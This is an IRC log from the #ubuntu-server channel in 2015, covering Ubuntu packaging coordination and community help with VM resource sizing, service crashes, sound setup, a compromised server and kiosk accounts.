<jamespage> coreycb, wait a sec
<smoser> rbasak, have you done any thing other than triage https://bugs.launchpad.net/ubuntu/+source/keepalived/+bug/1481337 . wondering if you have thoguht on how hard to push on a fix for that.
<ubottu> Launchpad bug 1481337 in keepalived (Ubuntu Vivid) "keepalived makes a floating IP available on more than one host after configuration reload" [Medium,Confirmed]
<rbasak> smoser: no, only triaging the bugs that I'm assigning - not looking deeply into anything.
<rbasak> smoser: I'm fine with it if you think it's more effort to SRU than it's worth, which it sounds like it is now that you've looked.
<smoser> well, its definitely not "just cherry pick patch"
<rbasak> smoser: maybe we can drop the SRU bug task importance to Low and I'll take it off my radar
<dork> yikes
<jamespage> coreycb, I'll sync it over - you'll get kudos and I'll get any release team flak
<coreycb> jamespage, ok thanks very much.  definitely need to move forward on liberty so I think it's worth it.
<jamespage> coreycb, if its the fix for a blocking issue, I think we can skip the FFe tbh
<coreycb> jamespage, good point
<jamespage> coreycb, ok synced - you can probably rebuild heat now
<jamespage> well in a bit
<jamespage> once its published
<coreycb> jamespage, ok will do
<jamespage> coreycb, urgh - its stuck in NEW
<coreycb> jamespage, oh gosh, because of the epoch?
<jamespage> coreycb, no cause of the python3 support
<jamespage> coreycb, accepted
<coreycb> jamespage, awesome
<Kalimero> i want to include my .htaccess to darkstats webui but i dont know where the wbfiles laying. any hints?
<smb> rbasak, [repost] OK, let me know how the updated paragraph for dpdk sounds to you
<teward> i assume i missed the server meeting.
<njbair> where would the relevant logs be for the "waiting for network configuration" startup delay?
<teward> njbair: nowhere, my guess is you have an 'auto eth0' or something in there that's holding up network booting, either by DHCP wait, or otherwise
<teward> (maybe in the boot logs, but if it's just waiting for configuration by DHCP, etc, it might not be listed)
<njbair> both of my interfaces are configured statically
<njbair> don't I want the auto eth0 line to bring up the interface automatically?
<teward> let it error out then check network information and see which one failed to 'configure' or rise up.  If neither have no config, then i'm not sure how you'll check... (most of mine come up instantly, and they're static configured too)
<Wicaeed> LVM/Virtualization question: Is there any difference, from an LVM standpoint, of adding an additional virtual disk to a VM vs. giving expanded capacity to an already existing virtual disk?
<Wicaeed> Oh, right, when you add capacity to an existing virtual disk fdisk doesn't see the additional capacity until you reboot. Herp
<RoyK> Wicaeed: iirc echo '- - -' > /sys/class/scsi_host/host0/scan
<bekks> Ah, good old SCSI reset :)
<RoyK> Wicaeed: have used that several times with vmware guests ;)
<Wicaeed> orly
<patdk-wk> doesn't work on pvscsi :)
<patdk-wk> you have to use something else to reset it
<Tangurin> Hi! aynone online?
<Tangurin> anyone*
<bekks> Tangurin: Look at "/names".
<Tangurin> Ahh! I ask because this weird server crash just happened to me! I was logged in to the site I am building, in the administration. When I press edit (an AJAX request is sent) the server crash! the Apache2 crash I guess! how is this possible? a site crash apache2?
<bekks> Look at the logs.
<Tangurin> what log should I look in bekks I am looking in?
<bekks> Tangurin: /var/log/
<Tangurin> bekks: okey but there is 1000 logs, where should I start :)
<Tangurin> bekks: when I press the save button in my administration, all my sites at the server goes offline and I get kicked from SSH! where is the logs for that, where do you think? :)
<bekks> Tangurin: As I already told you.
<Tangurin> bekks: you told me /var/log/
<bekks> I did.
<bekks> Whats unclear with that? :)
<Tangurin> I don't know where to look :/ bekks , This is so weird, I press save, an AJAX request is sent, and directly the server goes down
<bekks> Tangurin: So look at the logs in /var/log/
<Tangurin> bekks:  okey I will try find something
<bekks> You will find logs in there.
<Tangurin> bekks: I find them but I don't know which one to look for or what to find!
<bekks> So look at the logs which are younger than your crash. And no need to use exclamation marks all the time.
<JaguarDown> Hi all newbie here. Upon trying to restart the services clamav-daemon and clamav-milter, the daemon "clamd" appears to successfully stop but upon attempting to start it tries to change ownership of two files but says operation not permitted. Then clamav-milter stops but can't remove the PID file, tries to chown same two files, and kill the clamav-milter process, and set the GID but can't due to "operation not permitted"
<JaguarDown> http://pastebin.com/8qmSMLwM
<JaguarDown> Formatting got weird, not sure why. I am sure I have file permissions wrong somewhere but don't know where. I am following a tutorial to set up email and have rechecked everything exactly.
<JaguarDown> Just wondering if anybody had any experience with this.
<JaguarDown> This is the page of the tutorial I am currently on http://arstechnica.com/business/2014/03/taking-e-mail-back-part-3-fortifying-your-box-against-spammers/2/
<poorvikrampandit> Hi, just had a pretty major emergency where my Ubuntu server (running on a VMWare ESX vm with 2048 MB RAM, 1 CPU allocated) became completely unresponsive.
<bekks> poorvikrampandit: Add more CPU, more RAM.
<tgm4883> +1
<poorvikrampandit> Is it bad practice to run a memory & CPU-intensive application (image cropping server) on the same system as Postgresql and web application? I'm worried about Postgres becoming inconsistent (the OS killed the application, but I'm sure postgres could get killed too)
<bekks> poorvikrampandit: It is a bad practice to grant less resources than you need.
<tgm4883> than you need on a regular basis
<tgm4883> But yea, more resources!
<bekks> +1
<poorvikrampandit> bekks: How do I convince my boss the problem is RAM?
<poorvikrampandit> err, resources.
<bekks> Repeat the sentence to him.
<bekks> Last time we ran database hosts with 2GB RAM was like... 2000.
<poorvikrampandit> So does it sound like we are doing too much with too little, and not that our image cropping service is using too many resources?
<bekks> You are doing to much with too little.
<tgm4883> poorvikrampandit: you could watch the resources and then see what it does when you put load on it
<tgm4883> but I'd add more ram and a second CPU
<bekks> At least.
<tgm4883> sorry, yes. At least that. Depending on how many users you intend to have
<poorvikrampandit> You are being very helpful and I admit I am terribly out of my league. How much should I ask for?
<tgm4883> I don't build VMs with less than 1 CPU anymore
<mybalzitch> how could you have less than 1 cpu in a vm
<bekks> poorvikrampandit: Double the resources.
<tgm4883> poorvikrampandit: what does your host machine have for resources?
<bekks> poorvikrampandit: If the problem persists, analyze resource usage to see wether you need even more RAM or CPU or both.
<tgm4883> mybalzitch: heh, I meant 2 CPUs
<tgm4883> mybalzitch: although I suppose if you are oversubscribed enough it's like having half a CPU
<poorvikrampandit> bekks: That sounds doable if I kick off the other VMs running on the same machine (the host has 6GB and 2 3 GHz cores)
<tgm4883> poorvikrampandit: how many users are you planning on?
<tgm4883> are we talking 10, or 1000
<bekks> poorvikrampandit: Oh geez. Replace the host with current system.
<poorvikrampandit> tgm4883: Around 200 users with current hardware budget.
<poorvikrampandit> What I'm most worried about is this image cropper causes the kernel to go OOM on Postgres and data becomes inconsistent. Does moving the image cropper to its own VM sound like a way of insuring against this? It would at least guarantee the web app stays on,
<bekks> poorvikrampandit: Then get a server with enough RAM.
<bekks> poorvikrampandit: And split services into separate VMs.
<tgm4883> Yes, separate VMs would help here
<poorvikrampandit> Okay, so if you had a psql & redis, a web application (Node), image cropper (Golang), page rasterizer (another troublesome service written in go that thumbnails web pages), plus various other little go services that are more benign, how would you split them into VMs? I'm thinking what I can do is put the data-critical stuff (DBs, web app, services that aren't resource-intensive) on one VM, and the 2 resource-intensive s
<bekks> One critical service - one vm. A bunch of logical dependant uncritical services - one vm.
<poorvikrampandit> So I should split into two VMs even if I can't get a faster machine?
<poorvikrampandit> err, more RAM
<bekks> Ermm - no.
<bekks> If you cant get more CPU/RAM on your current host, get new hardware.
<poorvikrampandit> What if I'm stuck with the hardware I have, but I can kick the other VMs off and then have the full 6 GB to play with?
<bekks> You wont get more CPU then, since you have to leave one physical CPU for your host.
<bekks> And then - you have one CPU only for your VM.
<JaguarDown> Not that anyone was listening but please disregard my last question. The problem lied with not using sudo after the && operator. The tutorial's commands were being carried out in a root shell whereas I was playing it safe and using sudo for everything. Thanks anyway though.
<poorvikrampandit> Well, the machine has 2 cores -- we just only have one allocated right now to this service
<bekks> poorvikrampandit: two cores - one for the host, one for the vm. no more cores left.
<bekks> poorvikrampandit: your hardware just has too less resources.
<poorvikrampandit> The VM can't use both cores if I tell VMware to let it use both?
<bekks> Do NOT do that. Listen again: always leave ONE entire CPU for the host.
<sarnold> JaguarDown: woot :)
<poorvikrampandit> bekks: I'm writing that down.
<sarnold> bekks: that's good idea.
<JaguarDown> Let me rephrase that, it sounded rude: Not that anyone was available to answer my question is what I meant.
<bekks> poorvikrampandit: Engrave it over your door. Write it down the hallway. Print it on all flags inside and outside your office.
<poorvikrampandit> Hmm, what do I do then if I can't get better hardware?
<bekks> poorvikrampandit: Cry, or change your employer.
<bekks> poorvikrampandit: if you cant get more resources, the situation will not change.
<sarnold> poorvikrampandit: maybe you can rent better hardware from hetzner or amazon or digital ocean?
<sarnold> poorvikrampandit: for some stupid reason managers love renting things at twice the price of buying things.
<bekks> sarnold: :D
<poorvikrampandit> bekks: I can't ameliorate by going from 2048 to the full 6GB?
<poorvikrampandit> Yeah, the hardware is rented.
<dasjoe> sarnold: I tried to rent out some storage servers, they preferred to buy them :(
<bekks> poorvikrampandit: Using 6GB RAM will leave no RAM for your host. VMware ESXi has a requirement of at least 2GB for the host.
<sarnold> dasjoe: ha! :)
<sarnold> dasjoe: ohhhh, I understand now. boo. :( sorry to hear it.
<poorvikrampandit> Okay, what do I do to keep this thing on until the new server comes in?
<dasjoe> sarnold: still a good deal, but renting them out would've created passive income
<bekks> poorvikrampandit: Nothing. Hope that your problem will not occur again.
<sarnold> dasjoe: hey does that mean you're selling pre-made boxes now? :)
<poorvikrampandit> I may be reshuffling the chairs on the titanic's deck, but what if I just move the offending service to one of the other VMs (shutting down what's on that VM)? Then at least ImageCropService can't bring down the web app & Postgresql.
<jelly> poorvikrampandit: since you're using ESX as host, you should be able to see some performance graphs in the fat client of the flash web client
<jelly> and maybe deduce what the bottleneck was, this time
<poorvikrampandit> jelly: Good idea
<dasjoe> sarnold: I'm still thinking about doing it at a larger scale, yes. This box was built for a regular client, have some blinkenlights during a scrub: http://i.imgur.com/f7Xl3nf.gifv
<tgm4883> bekks: 2GB? I don't think ESXi uses that much by default. I'm not even sure you can force it that high
<sarnold> dasjoe: so very coool :)
<jelly> tgm4883: heh, that "much"
<tgm4883> jelly: that's a significant amount for something running nothing else but a hypervisor
<poorvikrampandit> It might be possible to move ImageCropper to EC2 if I can get a static IP.
<jelly> tgm4883: it's not much slack space for a meager 72GB RAM host
<tgm4883> jelly: It's possible I'm thinking about something else. I thought there was a setting in ESXI to set the memory that could be used by ESXi, and I thought it defaulted to 768MB and maxxed at around 1.5GB
<poorvikrampandit> Should I look at moving the CPU-intensive services to EC2 as an option? I doubt I can get any more RAM.
<poorvikrampandit> (beyond the physical 6GB)
<jelly> you should investigate what really happened, first
<tgm4883> poorvikrampandit: I think you should probably look at how much that would cost, vs buying more ram
<YamakasY> hi guys
<YamakasY> anyone a clue why the mysql.log files keep empty when I enable logging ?
<poorvikrampandit> Am I going to need to double my RAM&CPU again when I go from 4 users to 8 users, or is this more to do with a baseline cost to get the databases (postgres, redis) & services up and running?
<dasjoe> It might be more cost efficient to "upgrade" this servers resources by buying a newer server instead
<tgm4883> poorvikrampandit: you shouldn't need to double at that point. I think you're under the baseline just for running that
<prudentmav> how can I have a new /var/www/$user/ created when I run adduser?
<prudentmav> I want a public and logs dir in the user dir as well
<tgm4883> prudentmav: you need to tell it to create the home directory and where it should be located
<sarnold> prudentmav: look for /usr/local/sbin/adduser.local in adduser(8)
<poorvikrampandit> tgm4883: How do I know what the baseline is?
<sarnold> to a first approximation, add gobs of swap space, load it all, and see how deep into swap you are
<sarnold> that's only a first-approxmiation because it ignores the performance improvement you might get if more data fits into the kernel's block, page, and dentry caches -- most of which will be dropped under memory pressure
<sarnold> but if you're five gigs deep into swap, adding six gigs more RAM would help. if you ten gigs deep, adding twelve would help. etc.
<shauno> is it typical behaviour for LDS to run many copies of the same processes?  in particular, 6 copies of process-usns and 8 copies of process-alerts looks out of place to my eye
<sarnold> shauno: that may just be how they are multithreaded; check pstree output, do they all originate from the same parent process? if so, it's likely running as designed. if not, itm ight be worth further investigation.
<shauno> well, my attention was drawn to it because landscape keeps alerting it's "exceeding run timeout".  which is why it's getting an odd look
<sarnold> sounds like a well-deserved odd look :)
<shauno> if I understand pstree correctly, this looks like 8 seperate copies where the 2nd is launched before the first dies?  http://paste.ubuntu.com/12249134/
<jelly> or it's just some of the cron jobs never die, and they don't use locking to avoid running in parallel either
<jelly> (which in turn points to a possible different underlying issue)
<sarnold> yeah, I'm with jelly. please file a bug, make sure to include that output...
<jelly> update_security has nothing to do with LDS, does it?
<sarnold> those ought to have some locking around them, but there's probably something else broken to make the first one not die.. once the first one doesn't die, all bets are off..
<jelly> and yet there are seven of those as well
<jelly> if the kernel or filesystem is confused, all kinds of hangs like that can happen.  It's a nice way to find bugs that only happen in extreme conditions, but I'd bet those jobs are just collateral damage
<sarnold> check dmesg, there may be IO errors logged htere
<shauno> almost nothing in dmesg, my only even since boot (~18 hours) was [30155.163525] perf interrupt took too long (2501 > 2500), lowering kernel.perf_event_max_sample_rate to 50000
<poorvikrampandit> Okay, I wasn't able to get any more RAM, and couldn't get rid of all the other VMs, but I did negotiate moving the CPU/RAM intensive processes (ImageCrop.go and PageRasterizer.go) to their own instance, so the data-critical web app & postgres are no longer in danger of OOM.
<poorvikrampandit> Production will use two of the VMs now instead of one: 2 GB VM for mission critical, 1.5 GB VM for ImageProxy & PageRasterizer.
<poorvikrampandit> Maybe this buys time?
<poorvikrampandit> My boss will turn into Alec Baldwin in Glengarry/Glenross if this goes down again.
<sarnold> more memory shouldn't be too bad, something like $310 USD for another 32 gigs of ddr4.. http://www.crucial.com/usa/en/poweredge-t630/CT6236763
<dasjoe> He shouldn't skimp on hardware, then
<poorvikrampandit> It's rented hardware. (Unless they'll let me into their datacenter pop in another SIMM.)
<sarnold> 140EUR/mo can get you 128 gb of memory: https://www.hetzner.de/hosting/produkte_rootserver/px121ssd -- maybe they can be more competitive. or maybe you can move to hetzner. :)
<RevertToType> i cannot get sound out of my ubuntu-server install
<RevertToType> alsa nope, pulseaudio nope
<RevertToType> def recognizes the soundcard as "there"
<RevertToType> aplay /testwavs plays them but no sound through the speakers, alsa-mixer is wrenched up all the way, no bios issues, no acpi volume button messing me up
<sarnold> RevertToType: check permissions on the /dev/ nodes for the audio devices. iirc consolekit or something similar normally chowns those to logged in users when doing lightdm or whatever, but those pathways may not be used in a server install
<sarnold> RevertToType: also, note that alsa starts muted; perhaps it needs to be unmuted?
<RevertToType> wouldn't alsa-mixer set that?
<sarnold> it might, that might be the MM at the bottom of the sliders..
<sarnold> but it might also let you slide volumes around withuot actually unmuting, too
<poorvikrampandit> sarnold: Are hetzner reputable?
<poorvikrampandit> We've suffered from a lot of bozo hosts (like one in New York State that let the servers overheat and had bad RAM)?
<sarnold> poorvikrampandit: I think they have a bit of reputation as a 'bargain' outfit, but I haven't heard any specific complaints about services or customer service
<poorvikrampandit> Hmm, what does bargain mean?
<sarnold> cheap, thrifty
<Tangurin> Hi! I use Laravel on my ubuntu server but something is really wrong and the server crash and I get logged out from SSH and all sites on the server goes down when I trying to do a simple ajax request at the page! the /var/log/apache2/error.. doesn't tell me anything, where can I look for more information?
<RevertToType> thank you sarnold
<RevertToType> now to figure out why my networking periodically drops
<sarnold> RevertToType: got it? :) what was it? :)
<RevertToType> it was re-muting despite alsactl saving
<sarnold> Tangurin: check all the logs
<sarnold> RevertToType: oof. :/
<RevertToType> but i already have a bashlogin script so it's all good
<Tangurin> sarnold: what shall I look for, I can't see anything wrong
<RevertToType> hrm... my wpa-2 connection every once in a while drops... then i need to ifdown/ifup and re-dhclient ... anything offhand a common ish?
<sarnold> Tangurin: out-of-memory killer, segmentation faults, kernel panics, block io errors, etc etc..
<Tangurin> sarnold: thanks
<Tangurin> sarnold: init: failsafe main process (766) killed by TERM signal is this something?
<RoyK> if you see massive errors on a server (or even desktop) it's usually something bad in the hardware. try a memory test first. also, a bad PSU can make your day longer, in bad terms
#ubuntu-server 2015-09-02
<Tangurin> Hi! When my applikation is creating a row in the database it works fine, but when it edit a row in the database it crashes, I use Laravel on Ubuntu 14. Do you know why?
<ldc> hello!
<ldc> is it normal to have .sudo_as_admin_successful in my home
<ldc> since 15.04?
<RevertToType> does .xinit not work in a home directory anymore in 15.04?
<RevertToType> .xinitrc rather same question though
<tarpman> ldc: yes, it's normal
<tarpman> RevertToType: that depends very much on how you log in and how your session is launched
<RevertToType> nvm was too zoned to notice
<ldc> ok thanks
<RevertToType> tarpman:  i figured it out... stupid oversight on my part.
<tanuki> Why does my kernel update every week?
<sarnold> the kernel team works on roughly a three-week cadence where they integrate fixes, build, test, and deploy
<tanuki> I just wasn't expecting to be told to reboot my server so frequently, especially since it's running Trusty
<sarnold> and some security issues are severe enough that waiting three or four weeks before deploying the fix would be irresponsible, so they get 'emergency kernels', prepared outside the cadence
<tanuki> Makes sense, I guess
<sarnold> tanuki: you can investigate oracle's ksplice service; they have a hot-patch mechanism that reduces the needs for reboots while still deploying some fixes
<sarnold> I have no idea what they charge for this service, but if downtime is expensive, it might be enough to pay for itself
<tanuki> sarnold: Nah, not expensive at all. Just annoying.
<tanuki> It's a home server.
<sarnold> suse and red hat are working on merging their hot-patching mechanisms together, and then merging them into the kernel; it's possible that some updates in the future from ubuntu will be prepared in a manner to take advantage of it, but that feels like perhaps two years or more in the future...
<sarnold> *nod*
<sarnold> tanuki: don't tell anyone but I go months between reboots
<sarnold> once in a while I'll see a fix that justifies a reboot..
<OerHeks> as of kernel 4.x we don't need to reboot anymore, with hot patching.
<OerHeks> like ksplice
<sarnold> OerHeks: am I out of date again? has that already been merged?
<sarnold> tanuki: wow, it actually looks like oracle may provide ksplice for free to ubuntu and fedora users http://www.ksplice.com/try/desktop
<OerHeks> Yes, sarnold, http://www.zdnet.com/article/no-reboot-patching-comes-to-linux-4-0/ known for some time now, waiting for wily
<sarnold> OerHeks: woo :)
<ianorlin> although the jeos testcase for wily now seems to take 1.1 GB instead of the less than 800 MB it should according to testcase
<lordievader> Good morning.
<jamespage> coreycb, zul: I dropped init-system-helpers from liberty-staging - I could see no good reason for the backport - and it foobars everything that uses dh-systemd afterwards as its not compat with 14.04
<siebjee> Ënnjjk
<gnuoy> jamespage, the ceph radosgw init.d script is broken on trusty if you use restart. It stops the service but doesn't start it up again. I would say that that is an SRU candidate? I cannot reproduce on wily, although on wily systemd is falling back to the init script the issue doesn't appear. I assume it's ok to target a SRU fix directly at trusty since it's not relevant   in the current development release?
<jamespage> gnuoy, yes that's fine
<gnuoy> kk, thanks
<SlimG> What does it mean I get no output from "cryptsetup status /dev/mapper/cryptswap1" ?
<lightair> hi! I configured FQDN to be server.lightair.com. Then I install iRedMail and on step "Enter first domain name" I enter lightair.com. After installation Web Mail is installed to URL: https://server.lightair.com . How do I make iRedMail install WebMail and all other services to URL https://lightair.com ?
<siebjee> Is it true that 15.10 will be a LTS version ?
<siebjee> nvm, read the article wrong :(
<andol> siebjee: That sounds very unlikely.
<andol> Well, I guess the second statement does sound likely :-)
<lightair> hi! I configured FQDN to be server.lightair.com. Then I install iRedMail and on step "Enter first domain name" I enter lightair.com. After installation Web Mail is installed to URL: https://server.lightair.com . How do I make iRedMail install WebMail and all other services to URL https://lightair.com ?
<lordievader> siebjee: The next LTS is 16.04
<lordievader> Every even .04 is an LTS.
<Voyage> Is there a GUI tool to do torture test and measure cpu/memory performance ?
<teward> Voyage: this is the server channel, probably not going to get the best help for that here (ubuntu server installs typically run headless, i.e. no gui)
<lordievader> Voyage: Guis and servers.... What's wrong with stress?
<Voyage> ok. tell about no gui
<coreycb> jamespage, zul: can one of you rebuild openstack-trove when you get a chance?
<Voyage> teward,  servers can also have gui
<teward> Voyage: true, but I said "typically"
<teward> not "can they at all"
<Voyage> teward,  but you are mostly correct saying as a trend
<teward> keep that in mind
<Voyage> teward,  yes
<acmehandle> So I guess 15 is out?
<acmehandle> Is it gud?
<sb_9> How do I deal with a compromised server?
<jpds> sb_9: Unplug from the internet
<sb_9> my server is trying to attack another server. hacker is using it as proxy.
<jpds> sb_9: Unplug from the internet
<sb_9> then
<jpds> Find out how they got in, go through the logs
<patdk-wk> well, unplug the power from it
<patdk-wk> replace it with a new server
<patdk-wk> then look into how they compromised it
<patdk-wk> fix it issues on your current servers
<patdk-wk> shred compromised server
<sb_9> it was unplugged from internet. just i have digging into cause that compromised the system.
<jpds> sb_9: Found and fix the cause, reinstall the server from 0
<sb_9> patdk-wk: i have gone through log's and new logins, open ports, any unknown process.
<patdk-wk> it's rare for you to find a compromise that way
<jpds> sb_9: Also, consider putting an outgoing firewall on the box and block all unneeded outbound access
<patdk-wk> normally it's very very simple, vaunerable cgi
<sb_9> patdk-wk: Good Idea. Agree we have rare situations to identify the cause, but i need more suggestions on this.
<sb_9> can i have quick example of blocking all unneeded outbound access with firewall.
<patdk-wk> no
<patdk-wk> you need to be more specific
<sb_9> patdk-wk: how can i analyse the cause.  if it is with any cgi script?
<patdk-wk> ask your cgi script
<jpds> sb_9: We don't know what your server's running
<sb_9> patdk-wk: understood.
<jpds> sb_9: And if you don't know what it's running... you shouldn't be running it
<sb_9> jpds: i will check it.
<sb_9> jpds: okay. how can i idenitfy any offending files that was created in a specific time period?
<jpds> sb_9: With find command and the mtime option
<sb_9> jpds: thanks.
<patdk-wk> jpds, no
<patdk-wk> anyone can change the mtime of a file
<patdk-wk> so that is not accurate
<patdk-wk> and it wont tell you if it's is offending or not
<patdk-wk> I have found ext to be horrible at this
<jpds> patdk-wk: http://is.gd/Emzzd5
<patdk-wk> people can't change the mtime?
<sysrex> guys, is there anyway to see when a package in ubuntu trusty will be upgraded?
<jpds> sysrex: upgraded how?
<patdk-wk> sysrex, sometime in the next 3.5years, or not at all
<jpds> patdk-wk: That's what I picture when people just say "no"
<patdk-wk> you should look at creation time :)
<patdk-wk> and to get the creation time from ext is rather annoying
<jpds> patdk-wk: mtime might not be super accurate, but it's a good start
<jpds> patdk-wk: What if they didn't create a file?
<patdk-wk> yes, I have found it to be about 50% accurate myself, using mtime
<patdk-wk> jpds, you should never use just one thing :)
<patdk-wk> but most of the time they download a zip/tar/...
<patdk-wk> and unpack it
<patdk-wk> the unpack normally restores the mtime
<patdk-wk> yes, check mtime, but don't depend on it at all
<cyphermox> roaksoax: around? do you know if maas-enlist is still used? seems like this would do the device enlistment from the MAAS option on the ubuntu-server ISOs
<cyphermox> smoser: ^
<cyphermox> roaksoax: the problem is, maas-enlist-udeb depended on curl-udeb which apparently got dropped from curl because "it didn't work since before trusty"
<cyphermox> so either we should re-add curl-udeb to curl, or fix maas-enlist to say, use wget instead of curl
<rbasak> smb: your changes look fine, thanks. I've fixed the introductory paragraph and will send it now.
<smb> rbasak, Awesome. :)
<sysrex> patdk-wk, I mean when will tomcat 7.0.64 be available for trusty
<sysrex> to avoid buggy 7.0.55
<rbasak> arges, smb, jamespage: email to upstream DPDK sent
<arges> rbasak: good to hear
<smb> \o/ :)
<Seveas> 30
<samba35> how do i check kvm machine type used on ubuntu
<arges> samba35: 'kvm -M ?' will list the types
<samba35> ok
<samba35>  it  show -m require argument
<acmehandle> Is running a production server on 15 a good idea?
<acmehandle> Or should I stick with 14?
<acmehandle> this is a new server.
<ogra_> acmehandle, the non LTS releases go EOL after 9 months ... i would stick to LTS (unless you love upgrading to new releases in production)
<revolve> Hello there, I'm having a problem with redhat cluster manager in 12.04, it's producing this error: Starting cman... /usr/lib/lcrso/service_amf.lcrso: open failed: /usr/lib/lcrso/service_amf.lcrso: undefined symbol: logsys_rec_end
<revolve> I've also built it and its dependencies from src, experienced the same thing, and replaced them with the version from the repos again
<acmehandle> Ok, so this might be a silly question.  How long when  LTS go EOL?
<rbasak> acmehandle: https://wiki.ubuntu.com/Releases has all the details
<revolve> is anyone familiar with this issue with the ubuntu version of cman? I've got five debian nodes working perfectly fine :-/
<revolve> (generally thanks, though)
<roaksoax> cyphermox: it is still used for the ISO but not for maas anymore. For auto-enlistment in MAAS we ship our own
<cyphermox> roaksoax: so I've heard
<cyphermox> roaksoax: should still get fixed though, no?
<cyphermox> it would be really great if someone could spend the time to port it to use wget instead of curl, since that would mean not carrying extra delta on curl to ship a udeb.
<roaksoax> cyphermox: is there a bug for it?
<cyphermox> I don't know
<cyphermox> I think it's only on the NBS list: http://people.canonical.com/~ubuntu-archive/nbs.html
<acmehandle> Hhm, so maybe I should just go with 14.04 or 14.04.1
<Norbin> will installing nagios3 on the same server of already-running apache, make any changes to current sites/virtual hosts?
<revolve> Anyone familiar with CLVM hanging as soon as it's started?
<Pici> Norbin: It shouldn't. It may install a new file into /etc/apache2/conf-available/
<samba35> my system is giveing missing operating system
<samba35> how do i fix this
<lordievader> samba35: Install an operating system?
<revolve> accept missing operating system graciously
<samba35> i  have ubuntu 14.04.3 server installed
<lordievader> samba35: If there should be an operating system then it is time yo check your disks.
<samba35> on installed ubuntu i am getting this message
<revolve> don't tell it you want a found one
<lordievader> samba35: Boot a live disk and check your disks.
<ogra_> samba35, "on installed ubuntu" ? you mean after booting ?
<samba35> there was panic and after panic it give this message
<ogra_> "missing operating system" is typically a BIOS message ...
<lordievader> samba35: Check your disks...
<samba35> yes on ubuntu installed disk
<jamespage> coreycb, hey - can you take a look at the software-properties stuff for add-apt-repository - I think I assigned you a bug for that
<jamespage> its needs wily + trusty SRU's
<coreycb> sure
<coreycb> jamespage, ^
<jamespage> coreycb, ack
<jamespage> coreycb, I'll have to sponsor that for you I think
<jamespage> coreycb, btw why did we backport the wily init-system-helpers?
<coreycb> jamespage, hmm, not sure.  did I do that?
<coreycb> jamespage, which bug btw?  there are a few.
<coreycb> jamespage, I saw that you were dropping init-system-helpers
<jamespage> coreycb, I'm not certain - it was done via jenkins
<jamespage> it broken quite a few things
<jamespage> zul, ^^ was it you?
<jamespage> I have reverted and rebuilt impacted bits
<coreycb> jamespage, ok thanks.  do you have a bug # for the software-properties bug?
<jamespage> coreycb, can't remember
<coreycb> jamespage, what's it about?
<jamespage> coreycb, https://bugs.launchpad.net/ubuntu/+source/software-properties/+bug/1472586
<ubottu> Launchpad bug 1472586 in software-properties (Ubuntu) "Add support for liberty cloud-archive" [Undecided,New]
<coreycb> jamespage, thanks
<coreycb> jamespage, apparently I completely missed that one, I'll get on it
<jamespage> coreycb, backports to the staging ppa are trickling through - I had to work through a whole load of -S removals this morning
<coreycb> jamespage, -S removals?
<jamespage> coreycb, yeah - dpkg-parsechangelog -S is not supported on 14.04 - a number of packages use it to determine OSLO_PACKAGE_VERSION
<jamespage> breaks and ftbfs for backports
<coreycb> jamespage, ok
<zul> jamespage: possibly
<jamespage> zul, nm
<jamespage> coreycb, zul: requests/urllib3 are pretty bust right now
<jamespage> https://bugs.launchpad.net/ubuntu/+source/python-urllib3/+bug/1487645
<ubottu> Launchpad bug 1487645 in python-glanceclient "glance image-show does not output correctly" [Critical,In progress]
<zul> jamespage: what was the fix for the paresechangelog stuff?
<jamespage> zul, revert to seding the Version field
<zul> jamespage: ah i guess thats what happened for me for python-nose
<jamespage> zul, coreycb: I've pushed commits to debian repos where I can - but not uploaded; that can happen with something else useful for debian as stable has the right dpkg version
<zul> kk
<coreycb> jamespage,zul, I've uploaded software-properties for trusty and wily with support for cloud-archive:liberty(-proposed)
<zul> coreycb: ack
<dinet> Hello. I have a little problem after an upgrade and mod_rewrite have stoped working in apache
<dinet> and my googlefoo if failing misirably
<wiuempe> hello
<wiuempe> i want to configure this: http://help.ovh.co.uk/IpmiSol
<wiuempe> on ubuntu 14.04, but i dont know how to do it
<teward> WilliamDotAT: that page is instructions
<teward> erm
<teward> wiuempe: ^
<wiuempe> teward: yes
<teward> wiuempe: that page also suggests that if you don't know what you're doing, don't make these changes
<wiuempe> teward: i havent /etc/inittab
<wiuempe> and i dont know to what file in /etc/init i should add configuration to new tty
 * genii notices references later in the document to LiLo and immediately loses interest
<teward> wiuempe: i would not be turning on ImpiSol unless you know what you're doing... :/
<wiuempe> teward: https://help.ubuntu.com/community/SerialConsoleHowto
<wiuempe> thanks for help
<krizzo> Is there any method of a kickstart for a unattended pxe boot full install of ubuntu server?
<samba35> please correct me if i am wrong if you are using genric/default kernel and not using kernel from recompile in that case if you have  some configure is =y so that is load as a what and if it is load does that module show with lsmod command
<samba35>   a /boot/config-3.x.x-generic
<sarnold> samba35: kernel config options set =y are built-in to the kernel statically
<sarnold> krizzo: investigate maas and fai
<samba35> and how do i check them
<samba35> so i dont have to add them manually with /etc/modules right ?
<samba35> sarnold: please correct me
<sarnold> samba35: /boot/config-`uname -r` usually knows
<sarnold> but that's just by convention.. someone who self-compiled their kernel may not put their config in that location
<samba35> ok
<oal> I installed UFW and ran ufw allow $mycustomsshport
<oal> Now when I run ufw enable, I lose connection and can't reconnect. I lock myself out. Why is this?
<oal> ...until I reboot
<RevertToType> so this is gonna sound weird and maybe a bit on the daft side of things... but is there a way to set up a non-persistent or guest kind of account on ubuntu-server?
<sarnold> RevertToType: usual is to create a standard user account, let them use it, then prevent logins, go kill off any processes they may still have running, then delete their files again
<RevertToType> i was hoping i wouldn't have to work around with that much scripting
<RevertToType> damn
<sarnold> RevertToType: if you're inclined you could also create an apparmor profile for their shell to ensure they don't use setuid or setgid programs in an unexpected way
<RevertToType> so basically i'm trying to build a kiosk :/
<RevertToType> it's going... honestly i'd be happy as is but the webbrowser isn't playing well with one extension in incognito mode so i might need to pull that mode out
<RevertToType> which would then mean i'd need to make sure user data is utterly wiped
<sarnold> lightdm's guest mode may be a useful starting point
<RevertToType> i figured that only works if you have a full wm/de installed
<RevertToType> i'm just firing it off on x with no fancy stuff
<sarnold> I think it just starts sessions, it shouldn't place much requirement on what gets executed afterwards
<sarnold> but I don't know if it'd be easy to get lightdm to just log directly into the guest mode at startup. that bit might be more work than it's worth. but hpefully it's a useful thing to steal ideals from either way :)
<sarnold> s/ideals/ideas/
 * RevertToType nods
<RevertToType> i was thinking of ln the entire ~ to /tmp/whatever
<sarnold> or make /home a tmpfs?
 * RevertToType nods
<RevertToType> mebbe
<RevertToType> i just assume chrome throws a lot of noodly crap around outside of home
<tarpman> lightdm already has autologin-guest, no work involved there
<tarpman> RevertToType: as someone who has done both the lightdm and roll-your-own methods not long ago -- just use lightdm ;)
